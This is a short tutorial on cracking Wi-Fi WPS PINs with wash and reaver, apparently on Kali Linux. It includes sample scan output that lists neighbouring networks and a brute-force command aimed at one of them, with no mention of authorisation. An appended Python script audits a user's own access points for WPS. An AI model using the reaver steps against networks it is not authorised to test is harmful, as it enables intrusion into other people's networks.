Put the wireless card into monitor mode
# ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up
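- wlan0: the name of the wireless interface
- Operating system: Kali Linux
Scan for Wi-Fi devices that have WPS enabled
Any device whose WPS Locked column reads No can be tried for brute forcing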
# wash -i wlan0
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
---------------------------------------------------------------------------------------------------------------
E6:FF:18:81:FF:DC  11       00    1.0          No          TP-LINK5389
F0:FF:29:69:FF:C7  13       00    1.0          No          BOBO
40:FF:9F:73:FF:BA  6        00    1.0          No          DaoDao
Start the brute force with reaver
# reaver -i wlan0 -b 40:FF:9F:73:FF:BA -S -N -vv -c 6
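- This takes a long time; the scan files are saved in the /var/lib/reaver directory
- -i specifies the wireless interface
- -b specifies the target MAC address
- -S uses small DH keys (can speed up the cracking)
- -c specifies the channel, which makes it easier to find the signal; for example, -c 1 selects channel 1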
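The wash scan above doubles as an audit of your own equipment: any access point you administer that shows up in it still has WPS switched on. The script below is an added example, not part of the original notes; it parses text in the wash column layout and reports only BSSIDs from an inventory you supply. The sample scan text and the OWN_BSSIDS inventory are constructed for illustration.

```python
import re

# Constructed sample in the column layout wash prints (all values are made up).
SAMPLE_WASH_OUTPUT = """\
Wash v1.5.2 WiFi Protected Setup Scan Tool
BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
-----------------------------------------------------------------
02:00:00:00:00:01  11       -48   1.0          No          office-ap
02:00:00:00:00:02  13       -60   1.0          Yes         guest ap 2
02:00:00:00:00:03  6        -71   1.0          No          neighbour
"""

# Hypothetical inventory: BSSIDs of the access points you administer.
OWN_BSSIDS = {"02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:09"}

ROW = re.compile(
    r"^(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+"
    r"(?P<channel>\d+)\s+(?P<rssi>-?\d+)\s+(?P<version>\S+)\s+"
    r"(?P<locked>Yes|No)\s*(?P<essid>.*)$"
)

def parse_wash(text):
    """Return one dict per access-point row; banner and rule lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            row = m.groupdict()
            row["bssid"] = row["bssid"].upper()
            row["channel"] = int(row["channel"])
            row["locked"] = row["locked"] == "Yes"
            rows.append(row)
    return rows

def audit(text, own_bssids):
    """List owned APs that still advertise WPS, unlocked ones first."""
    own = {b.upper() for b in own_bssids}
    findings = []
    for row in parse_wash(text):
        if row["bssid"] not in own:
            continue  # not ours: out of scope for the audit
        severity = "medium" if row["locked"] else "high"
        findings.append((severity, row["bssid"], row["essid"], row["channel"]))
    return sorted(findings)  # "high" sorts before "medium"

if __name__ == "__main__":
    for severity, bssid, essid, channel in audit(SAMPLE_WASH_OUTPUT, OWN_BSSIDS):
        print(f"[{severity}] {essid} ({bssid}, ch {channel}): WPS enabled, disable it")
```

An owned BSSID that is missing from the findings either has WPS disabled or was out of range during the scan, so confirm on the device itself.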